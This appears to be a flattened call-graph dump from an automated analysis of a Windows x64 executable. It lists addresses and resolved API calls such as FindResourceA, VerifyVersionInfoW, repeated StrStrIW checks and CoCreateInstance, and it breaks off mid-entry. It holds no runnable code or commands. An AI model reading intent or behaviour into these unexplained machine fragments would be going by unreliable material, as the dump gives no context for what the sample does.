Concurrency::details::SchedulerProxy::DeleteThis 5 API calls 5601->5602 5603 140008a37 5602->5603 5604 140008950 Concurrency::details::SchedulerProxy::DeleteThis 5 API calls 5603->5604 5605 140008a45 5604->5605 5606 140008950 Concurrency::details::SchedulerProxy::DeleteThis 5 API calls 5605->5606 5607 140008a53 5606->5607 5608 140008950 Concurrency::details::SchedulerProxy::DeleteThis 5 API calls 5607->5608 5609 140008a61 5608->5609 5610 140008950 Concurrency::details::SchedulerProxy::DeleteThis 5 API calls 5609->5610 5611 140008a70 5610->5611 5612 1400068b8 Concurrency::details::SchedulerProxy::DeleteThis 5 API calls 5611->5612 5613 140008a7c 5612->5613 5614 1400068b8 Concurrency::details::SchedulerProxy::DeleteThis 5 API calls 5613->5614 5615 140008a88 5614->5615 5616 1400068b8 Concurrency::details::SchedulerProxy::DeleteThis 5 API calls 5615->5616 5617 140008a94 5616->5617 5618 1400068b8 Concurrency::details::SchedulerProxy::DeleteThis 5 API calls 5617->5618 5618->5585 5620 140008998 5619->5620 5622 140008984 5619->5622 5620->5588 5621 1400068b8 Concurrency::details::SchedulerProxy::DeleteThis 5 API calls 5621->5622 5622->5620 5622->5621 5653 1400091c4 5623->5653 5625 14000561d 5625->5456 5626 14000925c 5625->5626 5627 140009284 5626->5627 5629 1400092a5 5626->5629 5628 140005c30 _invalid_parameter_noinfo 5 API calls 5627->5628 5627->5629 5632 140009298 5627->5632 5628->5632 5631 140006770 Concurrency::details::SchedulerProxy::DeleteThis EnterCriticalSection 5629->5631 5637 14000937c 5629->5637 5630 1400092e2 5630->5456 5631->5637 5632->5629 5632->5630 5633 140009322 5632->5633 5634 140006090 _set_errno_from_matherr 5 API calls 5633->5634 5635 140009327 5634->5635 5656 140005f70 5635->5656 5638 1400094af 5637->5638 5641 1400093ed 5637->5641 5659 140005ab4 5637->5659 5639 140005ab4 16 API calls 5639->5641 5641->5639 5643 140005ab4 16 API calls 5643->5641 5645 140005d96 __scrt_fastfail 5644->5645 5646 140005dbe RtlCaptureContext RtlLookupFunctionEntry 5645->5646 5647 140005df8 RtlVirtualUnwind 5646->5647 5648 140005e2e __scrt_fastfail 5646->5648 5647->5648 5649 140005e71 UnhandledExceptionFilter 5648->5649 5650 140005e80 __scrt_fastfail 5649->5650 5688 140002080 5650->5688 5654 140006770 Concurrency::details::SchedulerProxy::DeleteThis EnterCriticalSection 5653->5654 5655 1400091dd 5654->5655 5655->5625 5682 140005ec0 5656->5682 5658 140005f89 5658->5630 5661 140005ac9 try_get_function 5659->5661 5660 140006484 _invalid_parameter_noinfo 3 API calls 5662 140005afe 5660->5662 5661->5660 5680 140005ae3 _invalid_parameter_noinfo 5661->5680 5663 140006840 _invalid_parameter_noinfo 5 API calls 5662->5663 5662->5680 5664 140005b11 5663->5664 5665 140005b2f 5664->5665 5666 140005b1f 5664->5666 5669 140006484 _invalid_parameter_noinfo 3 API calls 5665->5669 5667 140006484 _invalid_parameter_noinfo 3 API calls 5666->5667 5670 140005b26 5667->5670 5668 140005b72 5668->5643 5672 140005b37 5669->5672 5678 1400068b8 Concurrency::details::SchedulerProxy::DeleteThis 5 API calls 5670->5678 5671 140005614 16 API calls 5673 140005b87 5671->5673 5674 140005b3b 5672->5674 5675 140005b4d 5672->5675 5676 140006484 _invalid_parameter_noinfo 3 API calls 5674->5676 5677 140005864 _invalid_parameter_noinfo 5 API calls 5675->5677 5676->5670 5679 140005b55 5677->5679 5678->5680 5681 1400068b8 Concurrency::details::SchedulerProxy::DeleteThis 5 API calls 5679->5681 5680->5668 5680->5671 5681->5680 5683 140005c30 _invalid_parameter_noinfo 5 API calls 5682->5683 5684 140005ee5 5683->5684 5685 140005ef6 5684->5685 5686 140005ec0 _invalid_parameter_noinfo 5 API calls 5684->5686 5685->5658 5687 140005f89 5686->5687 5687->5658 5689 14000208a 5688->5689 5690 140002096 5689->5690 5691 140002390 IsProcessorFeaturePresent 5689->5691 5690->5458 5692 1400023a7 5691->5692 5697 140002584 RtlCaptureContext 5692->5697 5698 14000259e RtlLookupFunctionEntry 5697->5698 5699 1400025b4 RtlVirtualUnwind 5698->5699 5700 1400023ba 5698->5700 5699->5698 5699->5700 5701 14000235c 5700->5701 5706 14000e110 5701->5706 5707 14000e117 5706->5707 5709 140007b87 5708->5709 5710 140007b91 5709->5710 5711 140006770 Concurrency::details::SchedulerProxy::DeleteThis EnterCriticalSection 5709->5711 5712 140007c03 5710->5712 5713 140005614 16 API calls 5710->5713 5714 140007ba4 5711->5714 5712->5416 5715 140007c1b 5713->5715 5714->5710 5717 1400068b8 Concurrency::details::SchedulerProxy::DeleteThis 5 API calls 5714->5717 5716 140007c6e 5715->5716 5718 140005b88 16 API calls 5715->5718 5716->5416 5717->5710 5719 140007c58 5718->5719 5720 1400079a0 25 API calls 5719->5720 5720->5716 5758 14000405c 5721->5758 5724 1400076cc GetOEMCP 5726 1400076f3 5724->5726 5725 1400076de 5725->5726 5727 1400076e3 GetACP 5725->5727 5726->5423 5728 1400067e0 5726->5728 5727->5726 5729 14000682b 5728->5729 5732 1400067ef _invalid_parameter_noinfo 5728->5732 5730 140006090 _set_errno_from_matherr 5 API calls 5729->5730 5731 140006829 5730->5731 5731->5431 5734 140007c98 5731->5734 5732->5729 5732->5731 5733 140004220 _invalid_parameter_noinfo EnterCriticalSection 5732->5733 5733->5732 5735 1400076ac 18 API calls 5734->5735 5736 140007cc3 5735->5736 5738 140007d00 IsValidCodePage 5736->5738 5743 140007d43 __scrt_fastfail 5736->5743 5737 140002080 _handle_error 6 API calls 5739 140007a83 5737->5739 5740 140007d11 5738->5740 5738->5743 5739->5425 5739->5428 5741 140007d48 GetCPInfo 5740->5741 5744 140007d1a __scrt_fastfail 5740->5744 5741->5743 5741->5744 5743->5737 5791 1400077bc 5744->5791 5746 140006770 Concurrency::details::SchedulerProxy::DeleteThis EnterCriticalSection 5745->5746 5747 14000750c __scrt_fastfail 5746->5747 5748 140006090 _set_errno_from_matherr 5 API calls 5747->5748 5749 14000752f __scrt_fastfail 5747->5749 5750 14000759e 5748->5750 5752 140006090 _set_errno_from_matherr 5 API calls 5749->5752 5756 1400075d7 5749->5756 5751 140005f70 _invalid_parameter_noinfo 5 API calls 5750->5751 5751->5749 5753 140007635 5752->5753 5754 140005f70 _invalid_parameter_noinfo 5 API calls 5753->5754 5754->5756 5755 140007671 5755->5431 5756->5755 5757 1400068b8 Concurrency::details::SchedulerProxy::DeleteThis 5 API calls 5756->5757 5757->5755 5759 140004080 5758->5759 5765 14000407b 5758->5765 5760 140005ab4 16 API calls 5759->5760 5759->5765 5761 14000409b 5760->5761 5766 1400060b0 5761->5766 5765->5724 5765->5725 5767 1400060c5 5766->5767 5769 1400040be 5766->5769 5767->5769 5774 140008f74 5767->5774 5770 1400060e4 5769->5770 5771 1400060f9 5770->5771 5772 14000610c 5770->5772 5771->5772 5788 140007c7c 5771->5788 5772->5765 5775 140005ab4 16 API calls 5774->5775 5776 140008f83 5775->5776 5777 140008fcc 5776->5777 5778 140006770 Concurrency::details::SchedulerProxy::DeleteThis EnterCriticalSection 5776->5778 5777->5769 5779 140008faa 5778->5779 5784 140008fe0 5779->5784 5781 140008fba 5781->5777 5782 140005614 16 API calls 5781->5782 5783 140008fdf 5782->5783 5785 140008fff 5784->5785 5786 140008ff2 Concurrency::details::SchedulerProxy::DeleteThis 5784->5786 5785->5781 5786->5785 5787 140008ccc Concurrency::details::SchedulerProxy::DeleteThis 5 API calls 5786->5787 5787->5785 5789 140005ab4 16 API calls 5788->5789 5790 140007c85 5789->5790 5792 1400077f9 GetCPInfo 5791->5792 5793 1400078f1 5791->5793 5792->5793 5799 14000780c 5792->5799 5794 140002080 _handle_error 6 API calls 5793->5794 5795 14000798a 5794->5795 5795->5743 5802 140008ab0 5799->5802 5803 14000405c 16 API calls 5802->5803 5804 140008af2 5803->5804 5822 140008008 5804->5822 5823 140008010 MultiByteToWideChar 5822->5823 5825 14000e238 5823->5825 6016 1400040f8 5867->6016 5869 14000101c 5870 140004044 5869->5870 5871 140005ab4 16 API calls 5870->5871 5872 140001024 FindResourceA 5871->5872 5872->5326 5872->5327 6022 1400020ac 5873->6022 5875 14000120f lstrcpyW 5876 140003440 __scrt_fastfail 5875->5876 5877 140001243 VerSetConditionMask VerSetConditionMask VerSetConditionMask VerifyVersionInfoW 5876->5877 5878 1400012e1 lstrcatW lstrcatW lstrlenW 5877->5878 5879 1400012a6 lstrcatW 5877->5879 5882 1400020ac 35 API calls 5878->5882 5880 1400012c4 5879->5880 5881 1400012cb lstrcatW lstrcatW 5879->5881 5880->5881 5881->5878 5883 14000132e 5882->5883 5884 140001372 StrStrIW 5883->5884 6044 140004018 5883->6044 5885 1400013b3 5884->5885 5886 140001387 5884->5886 5888 1400013bb lstrlenW 5885->5888 5889 14000139e StrStrIW 5886->5889 5890 1400020ac 35 API calls 5888->5890 5889->5885 5889->5886 5895 1400013e1 5890->5895 5891 140001420 StrStrIW 5892 140001463 5891->5892 5896 140001435 5891->5896 5894 14000146b lstrlenW 5892->5894 5893 140004018 16 API calls 5893->5895 5897 1400020ac 35 API calls 5894->5897 5895->5891 5895->5893 5898 14000144e StrStrIW 5896->5898 5899 140001491 5897->5899 5898->5892 5898->5896 5900 1400014d0 StrStrIW 5899->5900 5903 140004018 16 API calls 5899->5903 5901 140001513 5900->5901 5902 1400014e5 5900->5902 5904 14000151b lstrlenW 5901->5904 5906 1400014fe StrStrIW 5902->5906 5903->5899 5905 1400020ac 35 API calls 5904->5905 5907 140001541 5905->5907 5906->5901 5906->5902 5908 140001580 StrStrIW 5907->5908 5911 140004018 16 API calls 5907->5911 5909 1400015c3 5908->5909 5910 140001595 5908->5910 5912 1400015cb lstrlenW 5909->5912 5913 1400015ae StrStrIW 5910->5913 5911->5907 5914 1400020ac 35 API calls 5912->5914 5913->5909 5913->5910 5915 1400015f1 5914->5915 5916 140001630 StrStrIW 5915->5916 5919 140004018 16 API calls 5915->5919 5917 140001673 5916->5917 5918 140001645 5916->5918 5920 14000167b lstrlenW 5917->5920 5921 14000165e StrStrIW 5918->5921 5919->5915 5922 1400020ac 35 API calls 5920->5922 5921->5917 5921->5918 5923 1400016a1 5922->5923 5924 1400016e0 StrStrIW 5923->5924 5927 140004018 16 API calls 5923->5927 5925 140001723 5924->5925 5926 1400016f5 5924->5926 5928 14000172b lstrlenW 5925->5928 5929 14000170e StrStrIW 5926->5929 5927->5923 5930 1400020ac 35 API calls 5928->5930 5929->5925 5929->5926 5931 140001751 5930->5931 5932 140001790 StrStrIW 5931->5932 5935 140004018 16 API calls 5931->5935 5933 1400017d3 5932->5933 5934 1400017a5 5932->5934 5936 1400017db lstrlenW 5933->5936 5937 1400017be StrStrIW 5934->5937 5935->5931 5938 1400020ac 35 API calls 5936->5938 5937->5933 5937->5934 5939 140001801 5938->5939 5940 140001840 StrStrIW 5939->5940 5943 140004018 16 API calls 5939->5943 5941 140001883 5940->5941 5942 140001855 5940->5942 5944 14000188b lstrlenW 5941->5944 5945 14000186e StrStrIW 5942->5945 5943->5939 5946 1400020ac 35 API calls 5944->5946 5945->5941 5945->5942 5947 1400018b1 5946->5947 5948 1400018f0 StrStrIW 5947->5948 5951 140004018 16 API calls 5947->5951 5949 140001933 5948->5949 5950 140001905 5948->5950 5952 14000193b lstrlenW 5949->5952 5953 14000191e StrStrIW 5950->5953 5951->5947 5954 1400020ac 35 API calls 5952->5954 5953->5949 5953->5950 5955 140001961 5954->5955 5956 1400019a0 StrStrIW 5955->5956 5959 140004018 16 API calls 5955->5959 5957 1400019e3 5956->5957 5958 1400019b5 5956->5958 5960 1400019eb lstrlenW 5957->5960 5962 1400019ce StrStrIW 5958->5962 5959->5955 5961 1400020ac 35 API calls 5960->5961 5963 140001a11 5961->5963 5962->5957 5962->5958 5964 140001a50 StrStrIW 5963->5964 5967 140004018 16 API calls 5963->5967 5965 140001a93 5964->5965 5966 140001a65 5964->5966 5968 140001a9b lstrlenW 5965->5968 5970 140001a7e StrStrIW 5966->5970 5967->5963 5969 1400020ac 35 API calls 5968->5969 5971 140001ac1 5969->5971 5970->5965 5970->5966 5972 140001b00 StrStrIW 5971->5972 5975 140004018 16 API calls 5971->5975 5973 140001b43 5972->5973 5974 140001b15 5972->5974 5976 140001b4b lstrlenW 5973->5976 5977 140001b2e StrStrIW 5974->5977 5975->5971 5978 1400020ac 35 API calls 5976->5978 5977->5973 5977->5974 5979 140001b71 5978->5979 5980 140001bb0 StrStrIW 5979->5980 5983 140004018 16 API calls 5979->5983 5981 140001bf3 5980->5981 5982 140001bc5 5980->5982 5984 140001bfb lstrlenW 5981->5984 5985 140001bde StrStrIW 5982->5985 5983->5979 5986 1400020ac 35 API calls 5984->5986 5985->5981 5985->5982 5987 140001c21 5986->5987 5988 140001c60 StrStrIW 5987->5988 5991 140004018 16 API calls 5987->5991 5989 140001ca3 5988->5989 5990 140001c75 5988->5990 5993 140002080 _handle_error 6 API calls 5989->5993 5992 140001c8e StrStrIW 5990->5992 5991->5987 5992->5989 5992->5990 5994 140001133 5993->5994 5994->5338 5996 14000204a 5995->5996 5997 140001fea CoCreateInstance 5995->5997 5998 140002080 _handle_error 6 API calls 5996->5998 5999 14000203f CoUninitialize 5997->5999 6001 140002020 5997->6001 6000 14000114f 5998->6000 5999->5996 6002 140001ce0 CoInitialize 6000->6002 6001->5999 6003 140001eb9 6002->6003 6004 140001d1c CoCreateInstance 6002->6004 6005 140002080 _handle_error 6 API calls 6003->6005 6006 140001eab CoUninitialize 6004->6006 6008 140001d58 6004->6008 6007 140001165 6005->6007 6006->6003 6007->5344 6009 140001ee0 CoInitialize 6007->6009 6008->6006 6010 140001f98 6009->6010 6011 140001f0e CoCreateInstance 6009->6011 6013 140002080 _handle_error 6 API calls 6010->6013 6012 140001f8d CoUninitialize 6011->6012 6015 140001f44 6011->6015 6012->6010 6014 140001fa7 6013->6014 6014->5344 6015->6012 6017 140004106 6016->6017 6019 140004116 6016->6019 6018 140006090 _set_errno_from_matherr 5 API calls 6017->6018 6020 14000410b 6018->6020 6019->5869 6021 140005f70 _invalid_parameter_noinfo 5 API calls 6020->6021 6021->6019 6023 1400020b4 6022->6023 6024 1400020d8 6023->6024 6025 140004220 _invalid_parameter_noinfo EnterCriticalSection 6023->6025 6026 1400020de 6023->6026 6024->5875 6025->6023 6027 1400020e9 6026->6027 6047 140002744 6026->6047 6051 140002764 6027->6051 6030 1400020ef 6055 140004e78 6030->6055 6032 14000210c 6061 140002820 6032->6061 6034 140002b10 __scrt_fastfail 5 API calls 6036 1400021a5 6034->6036 6035 140002124 _RTC_Initialize 6042 140002179 6035->6042 6066 1400029d0 6035->6066 6036->5875 6038 140002139 6069 1400046c4 6038->6069 6040 140002145 6040->6042 6100 140004f64 6040->6100 6042->6034 6043 140002195 6042->6043 6043->5875 6045 140005ab4 16 API calls 6044->6045 6046 140004021 6045->6046 6046->5883 6048 140002752 std::bad_alloc::bad_alloc 6047->6048 6107 140003284 6048->6107 6050 140002763 6052 140002772 std::bad_alloc::bad_alloc 6051->6052 6053 140003284 Concurrency::cancel_current_task 2 API calls 6052->6053 6054 140002783 6053->6054 6054->6030 6056 140004e89 6055->6056 6057 140004e91 6056->6057 6058 140006090 _set_errno_from_matherr 5 API calls 6056->6058 6057->6032 6059 140004ea0 6058->6059 6060 140005f70 _invalid_parameter_noinfo 5 API calls 6059->6060 6060->6057 6062 140002831 6061->6062 6063 140002836 __scrt_release_startup_lock 6061->6063 6062->6063 6064 140002b10 __scrt_fastfail 5 API calls 6062->6064 6063->6035 6065 1400028aa 6064->6065 6112 140002994 6066->6112 6068 1400029d9 6068->6038 6070 1400046e4 6069->6070 6079 1400046fb 6069->6079 6071 140004702 6070->6071 6072 1400046ec 6070->6072 6074 140007c1c 25 API calls 6071->6074 6073 140006090 _set_errno_from_matherr 5 API calls 6072->6073 6075 1400046f1 6073->6075 6076 140004707 6074->6076 6077 140005f70 _invalid_parameter_noinfo 5 API calls 6075->6077 6163 1400073d0 GetModuleFileNameW 6076->6163 6077->6079 6079->6040 6085 140004791 6088 1400044a0 16 API calls 6085->6088 6086 140004779 6087 140006090 _set_errno_from_matherr 5 API calls 6086->6087 6089 14000477e 6087->6089 6092 1400047ad 6088->6092 6090 1400068b8 Concurrency::details::SchedulerProxy::DeleteThis 5 API calls 6089->6090 6090->6079 6091 1400047b3 6093 1400068b8 Concurrency::details::SchedulerProxy::DeleteThis 5 API calls 6091->6093 6092->6091 6094 1400047f8 6092->6094 6095 1400047df 6092->6095 6093->6079 6098 1400068b8 Concurrency::details::SchedulerProxy::DeleteThis 5 API calls 6094->6098 6096 1400068b8 Concurrency::details::SchedulerProxy::DeleteThis 5 API calls 6095->6096 6097 1400047e8 6096->6097 6099 1400068b8 Concurrency::details::SchedulerProxy::DeleteThis 5 API calls 6097->6099 6098->6091 6099->6079 6101 140005ab4 16 API calls 6100->6101 6102 140004f71 6101->6102 6103 140004fa5 6102->6103 6104 140006090 _set_errno_from_matherr 5 API calls 6102->6104 6103->6042 6105 140004f9a 6104->6105 6106 140005f70 _invalid_parameter_noinfo 5 API calls 6105->6106 6106->6103 6108 1400032c0 RtlPcToFileHeader 6107->6108 6109 1400032a3 6107->6109 6110 1400032e7 RaiseException 6108->6110 6111 1400032d8 6108->6111 6109->6108 6110->6050 6111->6110 6113 1400029ae 6112->6113 6115 1400029a7 6112->6115 6116 1400053d4 6113->6116 6115->6068 6119 140005020 6116->6119 6118 140005416 6118->6115 6120 140006770 Concurrency::details::SchedulerProxy::DeleteThis EnterCriticalSection 6119->6120 6121 14000503c 6120->6121 6124 140005098 6121->6124 6123 140005045 6123->6118 6126 1400050c4 6124->6126 6133 140005159 6124->6133 6125 140005135 6128 140009048 7 API calls 6125->6128 6125->6133 6126->6125 6126->6133 6134 140009048 6126->6134 6130 14000514f 6128->6130 6129 14000512b 6131 1400068b8 Concurrency::details::SchedulerProxy::DeleteThis 5 API calls 6129->6131 6132 1400068b8 Concurrency::details::SchedulerProxy::DeleteThis 5 API calls 6130->6132 6131->6125 6132->6133 6133->6123 6135 140009087 6134->6135 6136 14000906a 6134->6136 6140 140009091 6135->6140 6143 14000a8e4 6135->6143 6136->6135 6137 140009078 6136->6137 6138 140006090 _set_errno_from_matherr 5 API calls 6137->6138 6142 14000907d __scrt_fastfail 6138->6142 6151 14000a920 6140->6151 6142->6129 6144 14000a906 HeapSize 6143->6144 6145 14000a8ed 6143->6145 6150 14000e0e8 6144->6150 6146 140006090 _set_errno_from_matherr 5 API calls 6145->6146 6147 14000a8f2 6146->6147 6148 140005f70 _invalid_parameter_noinfo 5 API calls 6147->6148 6149 14000a8fd 6148->6149 6149->6140 6152 14000a935 6151->6152 6153 14000a93f 6151->6153 6154 1400067e0 FreeLibrary GetProcAddress TlsSetValue EnterCriticalSection HeapFree 6152->6154 6155 14000a944 6153->6155 6161 14000a94b _invalid_parameter_noinfo 6153->6161 6158 14000a93d 6154->6158 6159 1400068b8 Concurrency::details::SchedulerProxy::DeleteThis 5 API calls 6155->6159 6156 14000a951 6160 140006090 _set_errno_from_matherr 5 API calls 6156->6160 6157 14000a97e HeapReAlloc 6157->6158 6157->6161 6158->6142 6159->6158 6160->6158 6161->6156 6161->6157 6162 140004220 _invalid_parameter_noinfo EnterCriticalSection 6161->6162 6162->6161 6164 140007416 try_get_function 6163->6164 6165 14000742a 6163->6165 6185 140006020 6164->6185 6166 14000405c 16 API calls 6165->6166 6167 140007458 6166->6167 6190 1400072bc 6167->6190 6169 140007423 6171 140002080 _handle_error 6 API calls 6169->6171 6172 14000471e 6171->6172 6173 1400044a0 6172->6173 6175 1400044de 6173->6175 6174 140007fcc 16 API calls 6174->6175 6175->6174 6177 140004544 6175->6177 6176 140004637 6179 140004664 6176->6179 6177->6176 6178 140007fcc 16 API calls 6177->6178 6178->6177 6180 14000467c 6179->6180 6184 1400046b4 6179->6184 6181 140006840 _invalid_parameter_noinfo 5 API calls 6180->6181 6180->6184 6182 1400046aa 6181->6182 6183 1400068b8 Concurrency::details::SchedulerProxy::DeleteThis 5 API calls 6182->6183 6183->6184 6184->6085 6184->6086 6186 140005c30 _invalid_parameter_noinfo 5 API calls 6185->6186 6187 140006031 6186->6187 6188 140005c30 _invalid_parameter_noinfo 5 API calls 6187->6188 6189 14000604a Concurrency::details::SchedulerProxy::DeleteThis 6188->6189 6189->6169 6191 1400072f9 6190->6191 6198 1400072e0 6190->6198 6192 140008064 WideCharToMultiByte 6191->6192 6197 1400072fe 6191->6197 6193 140007351 6192->6193 6194 140007358 try_get_function 6193->6194 6196 140007381 6193->6196 6193->6197 6194->6198 6200 140006020 5 API calls 6194->6200 6195 140006090 _set_errno_from_matherr 5 API calls 6195->6198 6199 140008064 WideCharToMultiByte 6196->6199 6197->6195 6197->6198 6198->6169 6199->6194 6201 140007365 6200->6201 6202 140006090 _set_errno_from_matherr 5 API calls 6201->6202 6202->6198 6204 140005ab4 16 API calls 6203->6204 6205 14000559d 6204->6205 6206 140005614 16 API calls 6205->6206 6207 1400055b3 6206->6207 6508 140005454 6511 140004a3c 6508->6511 6518 140004a04 6511->6518 6516 1400049c0 5 API calls 6517 140004a64 6516->6517 6519 140004a14 6518->6519 6520 140004a19 6518->6520 6521 1400049c0 5 API calls 6519->6521 6522 140004a20 6520->6522 6521->6520 6523 140004a35 6522->6523 6524 140004a30 6522->6524 6523->6516 6525 1400049c0 5 API calls 6524->6525 6525->6523 6550 140009894 6551 14000989f 6550->6551 6559 14000b6e4 6551->6559 6553 1400098a4 6566 14000b798 6553->6566 6556 1400098d5 6557 1400068b8 Concurrency::details::SchedulerProxy::DeleteThis 5 API calls 6556->6557 6558 1400098e1 6557->6558 6560 140006770 Concurrency::details::SchedulerProxy::DeleteThis EnterCriticalSection 6559->6560 6565 14000b6fd 6560->6565 6561 14000b77c 6561->6553 6562 14000b747 DeleteCriticalSection 6564 1400068b8 Concurrency::details::SchedulerProxy::DeleteThis 5 API calls 6562->6564 6564->6565 6565->6561 6565->6562 6570 14000bbb4 6565->6570 6567 1400098b6 DeleteCriticalSection 6566->6567 6568 14000b7ab 6566->6568 6567->6553 6567->6556 6568->6567 6569 1400068b8 Concurrency::details::SchedulerProxy::DeleteThis 5 API calls 6568->6569 6569->6567 6571 14000bbcb 6570->6571 6575 14000bbe9 6570->6575 6572 140006090 _set_errno_from_matherr 5 API calls 6571->6572 6573 14000bbd0 6572->6573 6574 140005f70 _invalid_parameter_noinfo 5 API calls 6573->6574 6577 14000bbdb 6574->6577 6575->6577 6578 14000bb30 6575->6578 6577->6565 6579 14000bb42 6578->6579 6580 14000bb57 6578->6580 6581 140006090 _set_errno_from_matherr 5 API calls 6579->6581 6586 14000bb52 6580->6586 6594 1400096a4 6580->6594 6583 14000bb47 6581->6583 6585 140005f70 _invalid_parameter_noinfo 5 API calls 6583->6585 6585->6586 6586->6577 6587 14000b798 5 API calls 6588 14000bb73 6587->6588 6600 140009a90 6588->6600 6593 1400068b8 Concurrency::details::SchedulerProxy::DeleteThis 5 API calls 6593->6586 6595 1400096c1 6594->6595 6596 1400096ef 6594->6596 6595->6596 6597 140009a90 5 API calls 6595->6597 6596->6587 6598 1400096e2 6597->6598 6621 14000b31c 6598->6621 6601 140009a99 6600->6601 6605 140009aa9 6600->6605 6602 140006090 _set_errno_from_matherr 5 API calls 6601->6602 6603 140009a9e 6602->6603 6604 140005f70 _invalid_parameter_noinfo 5 API calls 6603->6604 6604->6605 6606 14000c550 6605->6606 6607 14000c575 6606->6607 6608 14000c560 6606->6608 6610 14000c5d1 6607->6610 6615 14000c5a4 6607->6615 6609 140006070 5 API calls 6608->6609 6612 14000c565 6609->6612 6611 140006070 5 API calls 6610->6611 6613 14000c5d6 6611->6613 6614 140006090 _set_errno_from_matherr 5 API calls 6612->6614 6617 140006090 _set_errno_from_matherr 5 API calls 6613->6617 6618 14000bb82 6614->6618 6751 14000c4dc 6615->6751 6619 14000c5de 6617->6619 6618->6586 6618->6593 6620 140005f70 _invalid_parameter_noinfo 5 API calls 6619->6620 6620->6618 6622 14000b345 6621->6622 6626 14000b35d 6621->6626 6641 140006070 6622->6641 6624 14000b3d4 6627 140006070 5 API calls 6624->6627 6626->6624 6629 14000b38e 6626->6629 6630 14000b3d9 6627->6630 6628 140006090 _set_errno_from_matherr 5 API calls 6640 14000b352 6628->6640 6633 14000b3a5 6629->6633 6634 14000b3ba 6629->6634 6631 140006090 _set_errno_from_matherr 5 API calls 6630->6631 6632 14000b3e1 6631->6632 6635 140005f70 _invalid_parameter_noinfo 5 API calls 6632->6635 6637 140006090 _set_errno_from_matherr 5 API calls 6633->6637 6644 14000b408 6634->6644 6635->6640 6638 14000b3aa 6637->6638 6639 140006070 5 API calls 6638->6639 6639->6640 6640->6596 6642 140005c30 _invalid_parameter_noinfo 5 API calls 6641->6642 6643 140006079 6642->6643 6643->6628 6645 14000b431 6644->6645 6682 14000b44e 6644->6682 6646 14000b436 6645->6646 6648 14000b487 6645->6648 6647 140006070 5 API calls 6646->6647 6649 14000b43b 6647->6649 6650 14000b49d 6648->6650 6686 14000baec 6648->6686 6651 140006090 _set_errno_from_matherr 5 API calls 6649->6651 6696 14000b7d8 6650->6696 6654 14000b443 6651->6654 6655 140005f70 _invalid_parameter_noinfo 5 API calls 6654->6655 6655->6682 6657 14000b5b6 6658 14000b617 WriteFile 6657->6658 6659 14000b5c8 6657->6659 6683 14000b588 try_get_function 6658->6683 6661 14000b5d1 6659->6661 6662 14000b603 6659->6662 6660 140005ab4 16 API calls 6663 14000b4ce 6660->6663 6665 14000b5d6 6661->6665 6666 14000b5ef 6661->6666 6728 14000af8c 6662->6728 6663->6657 6668 14000b4f4 GetConsoleMode 6663->6668 6665->6683 6715 14000b090 6665->6715 6721 14000b1ac 6666->6721 6668->6657 6669 14000b516 6668->6669 6671 14000b598 6669->6671 6684 14000b51b 6669->6684 6704 14000aabc GetConsoleCP 6671->6704 6672 14000b68c 6677 140006090 _set_errno_from_matherr 5 API calls 6672->6677 6672->6682 6673 14000b67c 6676 140006020 5 API calls 6673->6676 6675 140006090 _set_errno_from_matherr 5 API calls 6678 14000b671 6675->6678 6676->6672 6679 14000b6ae 6677->6679 6680 140006070 5 API calls 6678->6680 6681 140006070 5 API calls 6679->6681 6680->6673 6681->6682 6682->6640 6683->6672 6683->6673 6683->6675 6683->6682 6684->6683 6685 14000baf4 CreateFileW WriteConsoleW CloseHandle CreateFileW WriteConsoleW 6684->6685 6685->6684 6687 14000ba50 6686->6687 6734 1400084e8 6687->6734 6690 14000ba75 6692 140006090 _set_errno_from_matherr 5 API calls 6690->6692 6691 14000ba86 SetFilePointerEx 6693 14000ba7a 6691->6693 6694 14000ba9e try_get_function 6691->6694 6692->6693 6693->6650 6695 140006020 5 API calls 6694->6695 6695->6693 6697 14000b7e1 6696->6697 6699 14000b7ee 6696->6699 6698 140006090 _set_errno_from_matherr 5 API calls 6697->6698 6700 14000b4ab 6698->6700 6699->6700 6701 140006090 _set_errno_from_matherr 5 API calls 6699->6701 6700->6657 6700->6660 6702 14000b825 6701->6702 6703 140005f70 _invalid_parameter_noinfo 5 API calls 6702->6703 6703->6700 6705 14000405c 16 API calls 6704->6705 6712 14000ab40 6705->6712 6706 140002080 _handle_error 6 API calls 6707 14000aecc 6706->6707 6707->6683 6709 14000b8c0 11 API calls 6709->6712 6710 140008064 WideCharToMultiByte 6710->6712 6711 14000adc0 WriteFile 6711->6712 6713 14000ae5f try_get_function 6711->6713 6712->6709 6712->6710 6712->6711 6712->6712 6712->6713 6714 14000ae07 WriteFile 6712->6714 6746 140006118 6712->6746 6713->6706 6714->6712 6714->6713 6719 14000b0a8 6715->6719 6716 140002080 _handle_error 6 API calls 6718 14000b191 6716->6718 6717 14000b137 WriteFile 6717->6719 6720 14000b174 try_get_function 6717->6720 6718->6683 6719->6717 6719->6720 6720->6716 6725 14000b1c8 6721->6725 6722 14000b2e5 try_get_function 6723 140002080 _handle_error 6 API calls 6722->6723 6724 14000b300 6723->6724 6724->6683 6725->6722 6726 140008064 WideCharToMultiByte 6725->6726 6727 14000b2a2 WriteFile 6725->6727 6726->6725 6727->6722 6727->6725 6732 14000afa4 6728->6732 6729 140002080 _handle_error 6 API calls 6730 14000b076 6729->6730 6730->6683 6731 14000b022 WriteFile 6731->6732 6733 14000b059 try_get_function 6731->6733 6732->6731 6732->6733 6733->6729 6735 1400084f1 6734->6735 6737 140008506 6734->6737 6736 140006070 5 API calls 6735->6736 6738 1400084f6 6736->6738 6739 140006070 5 API calls 6737->6739 6743 1400084fe 6737->6743 6740 140006090 _set_errno_from_matherr 5 API calls 6738->6740 6741 140008541 6739->6741 6740->6743 6742 140006090 _set_errno_from_matherr 5 API calls 6741->6742 6744 140008549 6742->6744 6743->6690 6743->6691 6745 140005f70 _invalid_parameter_noinfo 5 API calls 6744->6745 6745->6743 6747 140005ab4 16 API calls 6746->6747 6748 140006121 6747->6748 6749 1400060b0 16 API calls 6748->6749 6750 14000613a 6749->6750 6750->6712 6752 14000c4f8 6751->6752 6753 14000c522 6752->6753 6754 14000c52b 6752->6754 6758 14000c5f4 6753->6758 6756 140006090 _set_errno_from_matherr 5 API calls 6754->6756 6757 14000c527 6756->6757 6757->6618 6759 1400084e8 5 API calls 6758->6759 6762 14000c608 6759->6762 6760 14000c60e try_get_function 6772 14000842c 6760->6772 6762->6760 6764 1400084e8 5 API calls 6762->6764 6771 14000c64b 6762->6771 6766 14000c63e 6764->6766 6765 1400084e8 5 API calls 6767 14000c657 CloseHandle 6765->6767 6770 1400084e8 5 API calls 6766->6770 6767->6760 6768 140006020 5 API calls 6769 14000c69f 6768->6769 6769->6757 6770->6771 6771->6760 6771->6765 6773 140008448 